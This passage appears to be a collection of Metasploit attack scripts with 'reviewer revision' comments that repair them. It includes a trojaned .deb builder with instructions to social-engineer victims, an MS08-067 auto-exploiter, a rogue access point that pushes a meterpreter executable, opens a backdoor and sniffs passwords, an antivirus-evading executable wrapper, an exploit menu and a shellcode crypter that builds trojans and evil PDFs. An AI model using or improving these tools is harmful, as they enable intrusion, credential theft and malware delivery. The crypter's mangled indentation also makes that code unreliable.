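"$msfdir/msfpayload" "$payload" "${options[@]}" X > "$workdir/$trojan2" \
  || die "msfpayload failed"
[[ -s "$workdir/$trojan2" ]] || die "msfpayload produced an empty file"
echo

cd "$workdir/DEBIAN" || die "cannot cd to $workdir/DEBIAN"
chmod 755 postinst
dpkg-deb --build "$workdir" || die "dpkg-deb --build failed"
cd "$tmpdir" || die "cannot cd to $tmpdir"

echo
echo "Please enter your webroot directory:"
read -r webroot
[[ -d "$webroot" ]] || die "webroot '$webroot' is not a directory"
mv "$tmpdir/work.deb" "$webroot/$package.deb" || die "could not place the .deb in $webroot"
# :? aborts rather than running rm -rf on an empty path.
rm -rf -- "${tmpdir:?}"

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

webserver=(python -m SimpleHTTPServer 80)

echo "Would you like a Python webserver ? (y/n) :"
read -r svr
echo

if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
  cd "$webroot" || die "cannot cd to $webroot"
  "${webserver[@]}" &
  echo
else
  echo "Fair nuff, setup your own webserver :)"
  echo
fi

sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read -r handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
  echo
  "$msfdir/msfcli" exploit/multi/handler payload="$payload" "${options[@]}" E
else
  echo "Fair nuff, setup your own handler :)"
  echo
fi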

Python: SMB checker and exploiter 'MS08-067'

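#!/usr/bin/env python
#
# File_Name: SMB checker and exploiter 'MS08-067'
# Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
# Thanks: Dave Relik from #social-engineer --> freenode
# home: live.isecur1ty.org  lnxg33k.wordpress.com
#
# Reviewer revision: nmap and msfcli are run as argument lists instead of
# shell=True strings with %s interpolation (a hostile RHOST could inject
# shell syntax), the scan report goes to a private temporary file instead
# of the predictable /tmp/nmap.txt, and the file is closed and removed on
# every path.  print() with one argument behaves the same on Python 2.
#

import os
import re
import subprocess
import sys
import tempfile

if os.getuid() != 0:
    print('requires root privileges.')
    sys.exit(1)


def usage():
    """Exit with a usage message unless exactly three arguments were given."""
    if len(sys.argv) != 4:
        print('Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]')
        print('EX)    ./smb.py 192.168.1.50 192.168.1.6 443')
        sys.exit(1)


usage()

print(""" 
  ************************************************
  **\tSMB checker and exploiter 'MS08-067' \t**
  **\tWritten by: Ahmed Shawky aka lnxg33k \t**
  **\tThanks: Dave Relik @ #social-engineer\t**
  ************************************************
""")

RHOST = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

# Private report file; any local user could pre-create or symlink the
# fixed /tmp/nmap.txt the original wrote to.
fd, report = tempfile.mkstemp(prefix='nmap-', suffix='.txt')
os.close(fd)
try:
    subprocess.call(['nmap', '-sS', '-p445', '--script', 'smb-check-vulns.nse',
                     RHOST, '-oN', report])
    with open(report, 'r') as f:
        reader = f.read()
finally:
    # The report is only needed for the check below.
    try:
        os.remove(report)
    except OSError:
        pass

found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader)   #|   MS08-067: VULNERABLE
if not found:
    print('\nSystem is not vulnerable')
    sys.exit(1)

print('\nLooks like it\'s a vulnerable host')
print('I will exploit it for you\n')

# Each KEY=VALUE is one argv element; no shell is involved.
subprocess.call(['msfcli', 'exploit/windows/smb/ms08_067_netapi',
                 'PAYLOAD=windows/meterpreter/reverse_tcp',
                 'RHOST=%s' % RHOST, 'LHOST=%s' % LHOST, 'LPORT=%s' % LPORT,
                 'E'])

# Printed unconditionally, as in the original: msfcli's exit status does
# not say whether a session was actually obtained.
print('[**] Nice PWN')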

FakeAP_pwn.sh

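#!/bin/bash

# (C)opyright 2009 - g0tmi1k
#
# FakeAP_pwn.sh
#
# Stand up an open fake access point (airbase-ng) on $fakeap_interface,
# hand out addresses with dhcpd on at0, forward everything out through
# $internet_interface, redirect all HTTP to the local web server until the
# client has run the dropped executable, then restore forwarding, open the
# sbd back door and sniff the client's traffic.
#
# Reviewer revision: the published copy had been through a "smart quotes"
# filter -- every "..." and every --option had become typographic quotes
# and em-dashes, so the echo, airbase-ng and iptables lines could not run.
# Plain ASCII is restored and expansions are quoted; the attack flow is
# unchanged.  Needs root and the aircrack-ng/dsniff suites.

# Settings
export gatewayip=192.168.1.1
export internet_interface=wlan0
export fakeap_interface=wlan1

echo "[>] Starting: FakeAP_pwn - g0tmi1k"

# FakeAP
echo "[+] Setting up FakeAP"
modprobe tun
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" "$fakeap_interface" -v &
sleep 2

# Tables
echo "[+] Setting up forwarding tables..."
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# Start from empty tables; note this also drops any rules the host had.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
# All UDP (DNS included) from the fake AP side is sent to the real gateway.
iptables -t nat -A PREROUTING -p udp -j DNAT --to "$gatewayip"
#iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface "$internet_interface" -j MASQUERADE

# DHCP
echo "[+] Setting up DHCP server..."
xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0 &
sleep 2

# Need the user to come here
echo "[+] Start web server..."
#xterm -geometry 75x25+1+200  -T WebServer -e sh -c "start-apache"&
xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
sleep 2

# So lets force them!
echo "[+] Force user to vist our site..."
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1

# Bad boy stuff!
echo "[+] Here comes metasploit..."
cd /pentest/exploits/framework3 || { echo "[-] Metasploit not found at /pentest/exploits/framework3" >&2; exit 1; }
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
echo "[+] Uploading SBD..."
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E &
sleep 2
# upload //root/FakeAP_pwn/ C:/
# execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected
# NOTE(review): /tmp/FakeAP_pwn.tmp is a fixed, world-writable path, so any
# local user can create it and release this wait early.
rm -rf /tmp/FakeAP_pwn.tmp
echo "[-] Waitng for target to connect..."
while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
  sleep 1
done

# They give us access to their system, so lets give them internet back ;)
echo "[+] Give them (our) internet back..."
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to "$gatewayip"
#iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface "$internet_interface" -j MASQUERADE

# Lets connect! =)
# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
echo "[+] Lets us back in..."
konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332 &
sleep 2

# Get as much info as poss!
echo "[+] Watch what they do..."
# The sniffers listen on the uplink, as the original did (it hard-coded
# wlan0, which is $internet_interface's default value).
# URLs
xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i "$internet_interface" &
# Passwords
xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i "$internet_interface" &
# IM Chats
xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i "$internet_interface" &

echo 
echo "[+] DONE - Have you, g0tmi1k?"

# Lets get some stuff from metasploit whistle we are at it!
#sysinfo
#getuid
#use priv
#hashdump > /tmp/FakeAP_pwn-hash.txt
##session -l
##session -i 1
# Lets crack the hash
#cd /pentest/passwords/jtr/
#./john /tmp/FakeAP_pwn-hash.txt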

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

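#!/bin/bash
# Wrap an existing Windows executable around a windows/shell/reverse_tcp
# payload with msfencode, encoding the result $count times.
#   usage: <script> <revservip> <revservport> <binary filename>
#   output: <dir of binary>/<basename without extension>-out.exe
#
# Reviewer revision: ASCII quotes restored (the published copy had been
# through a "smart quotes" filter and would not parse), the template path is
# used as given (the original built "${tdir}/${bin}", which doubled the
# directory for anything but a bare filename), and the output name uses
# %.* so a dot in a parent directory no longer wipes the whole name.

# counts to mangle the trojan to avoid av detect
# keep low we want close to normal filesize for user not to suspect anything
count=15

if [[ $# -lt 3 ]]; then
  echo "usage $(basename "$0") <revservip> <revservport> <binary filename>"
  echo "to attach to filename-out.exe"
  echo "doesn't work well for PU binaries, they say"
  exit 1   # a usage error is a failure; the original exited 0
fi

ip=$1
port=$2
bin=$3
tdir=$(dirname "$bin")

[[ -f "$bin" ]] || { echo "no such file: $bin" >&2; exit 1; }
if ! [[ "$port" =~ ^[0-9]+$ ]]; then
  echo "port must be numeric: $port" >&2
  exit 1
fi
echo "encoding ${bin}-out.exe , mangling $count times"

out="${tdir}/$(basename "${bin%.*}")-out.exe"
msfpayload windows/shell/reverse_tcp LHOST="${ip}" LPORT="${port}" R | \
  msfencode -x "${bin}" -t exe -e x86/shikata_ga_nai -o "${out}" -c "$count"

#        msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E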

F*ck MS Exploit Menu

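# Ch0mpy-Pwn exploit menu: print a banner, then loop (via the SploitMenu
# label and the goto after each sub) offering five msfcli exploits against
# a target address read from STDIN.
#
# Reviewer revision: ASCII quotes restored (the published copy had been
# through a "smart quotes" filter and would not compile), the menu choice
# is chomped and checked to be a number, and EOF on STDIN ends the program
# instead of spinning forever.
use strict;

print "##############################\n";
print "#                            #\n";
print "#   ##### #   #   ##  #  #   #\n";
print "#   #     #   #  #  # # #    #\n";
print "#   ####  #   # #     ##     #\n";
print "#   #     #   #  #  # # #    #\n";
print "#   #      ###    ##  #  #   #\n";
print "#                            #\n";
print "# #    # #   ##  ###    ##   #\n";
print "# # # ## #  #  # #  #  #  #  #\n";
print "# #  # # # #     ###  #    # #\n";
print "# #    # #  #  # #  #  #  #  #\n";
print "# #    # #   ##  #   #  ##   #\n";
print "#                            #\n";
print "#   ##    ##   ##### ######  #\n";
print "#  #  #  #  #  #        #    #\n";
print "#   #   #    # ####     #    #\n";
print "# #  #   #  #  #        #    #\n";
print "#  ##     ##   #        #    #\n";
print "#                            #\n";
print "##############################\n";

system("sleep 3");
system("clear");

SploitMenu:
print " ##################\n";
print " #  Exploit Menu  #\n";
print " ##################\n";
print " 1 - Run MS-08-067 \n";
print " 2 - Run MS-10-061 \n";
print " 3 - Run MS-03-026 \n";
print " 4 - Run MS-04-031 \n";
print " 5 - Run MS-07-029 \n";
print " 6 - Exit          \n";
print "----------------------------\n";
print "\n\nCh0mpy-Pwn>";

my $choice = <STDIN>;
CORE::exit(0) unless defined $choice;   # EOF: the original looped forever here
chomp $choice;
# Anything that is not a menu number just redraws the menu (the original
# compared arbitrary text with == and silently treated it as 0).
$choice = 0 unless $choice =~ /^\d+$/;

if ($choice == 1) { &ms08067 }
if ($choice == 2) { &ms10061 }
if ($choice == 3) { &dcom }
if ($choice == 4) { &netdde }
if ($choice == 5) { &zonename }
if ($choice == 6) { &exit }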

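sub ms08067
{
    # Menu entry 1: MS08-067 (netapi) against the address typed at the
    # prompt, with a bind_tcp meterpreter payload.
    print " The only input you need is the targets IP address \n";
    print " This simply runs MS-08-067 on them and gives you a Meterpreter shell \n";
    print " Conficker Style liek a baws \n";
    print "\n\nTarget>";
    my $target = <STDIN>;
    # The original never chomped, so the newline ended the shell command
    # before the mode letter; also restrict to host/IP characters so the
    # target can never carry shell syntax.
    chomp $target if defined $target;
    unless (defined $target && $target =~ /^[A-Za-z0-9.:_-]+$/) {
        print " Invalid target\n";
        return;
    }
    # List-form system(): no shell, one argv element per word.  msfcli takes
    # the mode as a bare letter (E), as every other handler invocation in
    # this collection does.
    system('msfcli', 'windows/smb/ms08_067_netapi', "RHOST=$target",
           'PAYLOAD=windows/meterpreter/bind_tcp', 'E');
}

goto SploitMenu;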

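sub ms10061
{
    # Menu entry 2: MS10-061 (print spooler) against the typed address.
    print " The only input you need is the targets IP address \n";
    print " This simply runs MS-10-061 on them and gives you a Meterpreter shell \n";
    print " Owning liek a Stuxnet \n";
    print "\n\nTarget>";
    my $target = <STDIN>;
    # chomp: the original kept the newline, which split the shell command.
    chomp $target if defined $target;
    unless (defined $target && $target =~ /^[A-Za-z0-9.:_-]+$/) {
        print " Invalid target\n";
        return;
    }
    # No shell; mode letter E as used elsewhere in this collection.
    system('msfcli', 'windows/smb/ms10_061_spoolss', "RHOST=$target",
           'PAYLOAD=windows/meterpreter/bind_tcp', 'E');
}

goto SploitMenu;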

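sub dcom
{
    # Menu entry 3: MS03-026 (RPC DCOM) against the typed address.
    print " The only input you need is the targets IP address \n";
    print " This simply runs MS-03-026 on them and gives you a Meterpreter shell \n";
    print " Dcom vulns... Patch plz lol \n";
    print "\n\nTarget>";
    my $target = <STDIN>;
    # chomp: the original kept the newline, which split the shell command.
    chomp $target if defined $target;
    unless (defined $target && $target =~ /^[A-Za-z0-9.:_-]+$/) {
        print " Invalid target\n";
        return;
    }
    # No shell; mode letter E as used elsewhere in this collection.
    system('msfcli', 'exploit/windows/dcerpc/ms03_026_dcom', "RHOST=$target",
           'PAYLOAD=windows/meterpreter/bind_tcp', 'E');
}

goto SploitMenu;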

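sub netdde
{
    # Menu entry 4: MS04-031 (NetDDE) against the typed address.
    print " The only input you need is the targets IP address \n";
    print " This simply runs MS-04-031 on them and gives you a Meterpreter shell \n";
    print " moar old vulns... Patch plz lol \n";
    print "\n\nTarget>";
    my $target = <STDIN>;
    # chomp: the original kept the newline, which split the shell command.
    chomp $target if defined $target;
    unless (defined $target && $target =~ /^[A-Za-z0-9.:_-]+$/) {
        print " Invalid target\n";
        return;
    }
    # No shell; mode letter E as used elsewhere in this collection.
    system('msfcli', 'windows/smb/ms04_031_netdde', "RHOST=$target",
           'PAYLOAD=windows/meterpreter/bind_tcp', 'E');
}

goto SploitMenu;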

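sub zonename
{
    # Menu entry 5: MS07-029 (DNS RPC zonename) against the typed address.
    print " The only input you need is the targets IP address \n";
    print " This simply runs MS-07-029 on them and gives you a Meterpreter shell \n";
    print " No idea how this one works bro \n";
    print "\n\nTarget>";
    my $target = <STDIN>;
    # chomp: the original kept the newline, which split the shell command.
    chomp $target if defined $target;
    unless (defined $target && $target =~ /^[A-Za-z0-9.:_-]+$/) {
        print " Invalid target\n";
        return;
    }
    # No shell; mode letter E as used elsewhere in this collection.
    system('msfcli', 'windows/dcerpc/ms07_029_msdns_zonename', "RHOST=$target",
           'PAYLOAD=windows/meterpreter/bind_tcp', 'E');
}

goto SploitMenu;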

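sub exit
{
    # Menu entry 6.  The name shadows the builtin, which is why the
    # dispatcher calls it as &exit; inside, the builtin is named
    # explicitly so there is no ambiguity about which exit runs.
    CORE::exit(0);
}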

Motioncity13’s Option Menu

#!/bin/bash

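function pause(){
  # Show $* as a prompt and wait for one line of input (read -p prints the
  # prompt only when stdin is a terminal).  Returns read's status, so it is
  # non-zero at end of input.  ASCII quotes restored: the published copy
  # had typographic quotes around $* and would not parse.
  read -r -p "$*"
}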

#######################################
# Prompts for a payload name, LHOST and LPORT, then either writes an
# msfpayload executable to a user-supplied filename or starts an msfcli
# multi/handler for those values.
# Every answer is expanded unquoted straight into the command line with no
# validation. The curly quotes on this page are ordinary characters to bash,
# so the y/n test below compares $t1 with the literal text “y”, not with y.
# Globals:   pay, lh, lp, t1, fil (written; none declared local)
# Returns:   status of msfpayload or msfcli
#######################################
function listner () {

echo -n “Enter Payload: “

read pay

echo -n “Enter LHOST: “

read lh

echo -n “Enter LPORT: “

read lp

    echo -n “Create Payload (y/n)? “

read t1

# Compares against the literal “y” (curly quotes included) — see header.
if [ “$t1” = “y” ]; then {

    echo -n “Filename (*.exe): “

    read fil

    # Output redirected to whatever was typed as the filename, unquoted.
    msfpayload $pay LHOST=$lh LPORT=$lp X > $fil

    }

else

msfcli exploit/multi/handler PAYLOAD=$pay LHOST=$lh LPORT=$lp E

fi

}

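#######################################
# Interactive nmap walkthrough: asks for one address, then runs a ping scan,
# an OS-detection scan and a SYN port scan against it, pausing between steps.
# Globals:   none (ip is local)
# Arguments: none; the address is read from stdin
# Outputs:   nmap output on stdout; an error on stderr if no address is given
# Returns:   1 when the address is empty, otherwise the status of the last
#            command (clear)
#######################################
nmp() {
  local ip

  # Real ASCII quotes: the page's curly quotes were printed literally.
  echo "NMAP IP Address Scanner"
  echo "IP Address: "
  read -r ip

  # Refuse an empty address rather than handing nmap a missing target.
  if [ -z "$ip" ]; then
    echo "No IP address given." >&2
    return 1
  fi

  echo
  echo "First we are going to do a ping scan."
  sleep 2
  nmap -sP "$ip"
  pause 'Press any key to continue…'

  echo
  echo "Next we are going to scan for the Operating System the slave is running on."
  sleep 2
  # Option before the target; quoted so the value is passed as one word.
  nmap -O "$ip"
  pause 'Press any key to continue…'

  echo
  echo "Next we detect open ports on the target."
  sleep 2
  # -sS (like -O above) typically needs raw-socket privileges.
  nmap -sS "$ip"
  echo
  pause 'Press any key to continue…'

  clear
}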

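# Menu banner. Real ASCII quotes: the curly quotes on the page are ordinary
# characters to bash and were being printed as part of the text.
echo "           Menu List"
echo "          —————-"
echo "Motioncity13’s Option Menu (First Bash Code)"
echo
echo "1) Metasploit Payload Generator and Listener"
echo "2) NMAP Scanner"
echo "3) Quit"
echo

# Dispatch loop: one selection per line until 3 is chosen or input ends.
while true; do
  # On end of input read fails and op is empty; without the exit the loop
  # would print "Wrong selection." forever.
  read -r op || exit 0

  # Plain patterns: with the curly quotes the patterns were the literal
  # strings “1”, “2”, “3” and typing 1, 2 or 3 never matched.
  case "$op" in
    1)
      # Call Metasploit Function
      listner
      ;;
    2)
      # Call NMP Function
      nmp
      ;;
    3)
      echo
      exit 0
      ;;
    *)
      echo
      echo "Wrong selection."
      ;;
  esac
done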

#echo

#exit 0

Crypter for metasploit

#!/usr/bin/python

#coding: utf-8

# Interactive Python 2 script (print statements, raw_input, xrange and the
# `commands` module, which Python 3 removed). It generates a Metasploit
# payload with msfpayload/msfencode, embeds it in a C template
# (structure.c, not shown on this page), cross-compiles the result, copies it
# under /var/www and finally starts a listener.
# Every prompt answer below is interpolated into os.system() command strings
# without validation, and the work files (ip.txt, temp.raw, temp.c, a.exe)
# are created with fixed names in the working directory.
# NOTE(review): the indentation of the if/else/for bodies appears to have
# been lost when the page was rendered; as printed here the script does not
# parse.

from struct import *

import os

import commands

import subprocess

import random 

os.system(“clear”)

# Hard-coded Metasploit install path; every ./msf* call below is relative to it.
os.chdir(“/opt/metasploit/msf3”)

print “**************************************”

print ”       __      __   __    ___    __”

print ”      / /     / /  /  \  / _ \  / /”

print ”     / /     / /__/ /\ \/ / \ \/ / “

print ”    / /     / ___  /  \  /   \  /  ”

print ”   / /_____/ /  / /   / /   / /\ \ “

print ”  /_________/  /_/   /_/   /_/  \_\”

print “”

print “**************************************”

print ”          Crypter for metasploit    ”

print “**************************************”

host = raw_input(“lhost (e for external ip) ?”).strip()

if host == ‘e’:

# Asks an external web service for the public address and trusts the reply
# verbatim; it is reused in shell commands below. The '»' is presumably a
# mangled '>>'.
os.system(“curl ifconfig.me » ip.txt”)

lhost = commands.getoutput(‘cat ip.txt’)

os.system(“rm ip.txt”)

os.system(“clear”)

print “[*] lhost: “, lhost

else:

lhost = host

print “[*] lhost: “, lhost

# Not checked to be numeric before being placed in command strings.
lport = raw_input(“lport ?”).strip()

print “[*] lport: “, lport

print “**************************************”

print “1) windows/shell_reverse_tcp”

print “2) windows/shell/reverse_tcp”

print “3) windows/shell/reverse_tcp_dns”

print “4) windows/shell/reverse_http”

print “5) windows/meterpreter/reverse_tcp”

print “6) windows/meterpreter/reverse_tcp_dns”

print “7) windows/meterpreter/reverse_http”

print “**************************************”

# Seven payloads are listed but the prompt says 1-8. An answer outside 1-7
# matches none of the branches below, so temp.raw is never written and the
# open(payload_raw, "rb") further down raises IOError.
payload = raw_input(“Select a payload (1-8):”).strip()

payload_raw = “temp.raw”

out = “temp.c”

structure = “structure.c”

key = random.randint(0,255)

print “[*] Generating random junk…”

print “[*] Randomizing file size…”

randomSize = random.randint(20480,25600)

junkA = “”

junkB = “” 

# junkA and junkB are quoted blobs of random upper-case letters that are
# substituted into the C template; note junkA's loop starts at 1 and junkB's
# at 0, so the two differ in length by one.
junkA += “"”

for i in xrange(1,randomSize):

junkA += chr(random.randint(65,90)) 

junkA +=  ”"”

junkB += “"”

for i in xrange(0,randomSize):

junkB += chr(random.randint(65,90)) 

junkB +=  ”"”

print “[*] Generating metasploit shellcode…”

# lhost and lport go into the command string unquoted; no else branch.
if payload == “1”:

os.system(“./msfpayload windows/shell_reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “2”:

os.system(“./msfpayload windows/shell/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “3”:

os.system(“./msfpayload windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “4”:

os.system(“./msfpayload windows/shell/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “5”:

os.system(“./msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “6”:

os.system(“./msfpayload windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

elif payload == “7”:

os.system(“./msfpayload windows/meterpreter/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4” % (lhost,lport,payload_raw))

# Neither file handle is closed explicitly; b is only flushed after the write.
a = open(payload_raw,”rb”)

b = open(out,”w”)

# payload_raw is rebound from the file name to the file contents here.
payload_raw = a.read()

tempArray = []

outArray = []

x = 0

print “[*] Encoding with XOR key: “, hex(key) 

print “[*] Obfuscating shellcode…”

# Each shellcode byte is followed by one filler byte, so `length` is twice
# the shellcode size; it is the value later handed to the C template.
length = int(len(payload_raw)*2)

for i in xrange(0,length):

if i % 2 == 0:

tempArray.append(unpack(“B”,payload_raw[x])[0]^key)

x += 1

else:

randomByte = random.randint(65,90)

tempArray.append(randomByte)

# Renders the bytes as C string escapes, 15 per quoted line.
for i in range(0,len(tempArray)):

tempArray[i]=”\x%x”%tempArray[i]

for i in range(0,len(tempArray),15):

outArray.append(‘\n”’+”“.join(tempArray[i:i+15])+”"”)

outArray = “”.join(outArray)

devide = “i % 2;”

# structure.c is expected to contain six %-format slots in this order; the
# template itself is not on this page.
open_structure = open(structure).read()

code = open_structure % (junkA,outArray,junkB,key,length,devide)

b.write(code)

b.flush()

print “[*] Compiling trojan horse…”

# Cross-compiles with MinGW; no -o is given, so the next steps rely on the
# compiler's default output name a.exe.
os.system(“i586-mingw32msvc-gcc -mwindows temp.c”)

print “[*] Stripping out the debugging symbols…”

# '—strip-debug' is presumably a mangled '--strip-debug'.
os.system(“strip —strip-debug a.exe”)

print “[*] Moving trojan horse to web root…”

os.system(“mv a.exe /var/www/backdoor.exe”)

print “**************************************”

print “1) apache server”

print “2) java applet attack”

print “3) create evil PDF”

print “**************************************”

attack = raw_input(“Select an attack (1-n):”).strip()

if attack == “1”:

print “[*] Starting apache…”

# A nested sh -c only to chain the two commands.
os.system(‘sh -c “service apache2 start; sleep 4”’)

if attack == “2”:

# '—command=' is presumably a mangled '--command='; javaAttack.sh is not on
# this page. The .pid attribute is read and discarded.
subprocess.Popen(args=[“gnome-terminal”, “—command=sh javaAttack.sh”]).pid

if attack == “3”:

# Interpolated unquoted: a path with spaces or shell metacharacters breaks
# the command or is interpreted by the shell.
original = raw_input(“path to original pdf: “).strip()

print “[*] Creating evil PDF…”

os.system(“./msfcli windows/fileformat/adobe_pdf_embedded_exe EXE::Custom=/var/www/backdoor.exe FILENAME=backdoor.pdf INFILENAME=%s E” % (original))

# Fixed path under /root/.msf4, i.e. the script assumes it runs as root.
os.system(“mv /root/.msf4/local/backdoor.pdf /var/www”)

print “[*] moving backdoor.pdf to webroot”

print “[*] lhost: “, lhost

print “[*] lport: “, lport

# Payload 1 gets a plain netcat listener on lport; the others start an
# msfcli multi/handler with the matching payload name.
if payload == “1”:

print “[*] Starting the netcat listener…”

os.system(“nc -lvp %s” % (lport))

elif payload == “2”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “3”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “4”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/shell/reverse_http LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “5”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “6”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s E” % (lhost, lport))

elif payload == “7”:

print “[*] Starting the multi handler…”

os.system(“./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_http LHOST=%s LPORT=%s E” % (lhost, lport))

print “[*] Cleaning up…”

# Removes only the two work files; the copies placed under /var/www stay.
os.system(“rm temp.c”)

os.system(“rm temp.raw”)

print “[*] Done !”